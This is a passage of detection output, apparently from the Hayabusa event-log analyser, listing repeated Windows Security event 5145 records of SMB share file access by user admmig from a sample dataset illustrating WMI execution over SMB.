Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.811 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.811 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.843 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.843 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.843 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.843 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.843 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.843 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.858 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.874 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.874 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.874 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.874 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.874 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.874 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.874 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.907 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.907 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.907 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.953 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.953 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.985 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.985 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.985 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.985 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.985 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 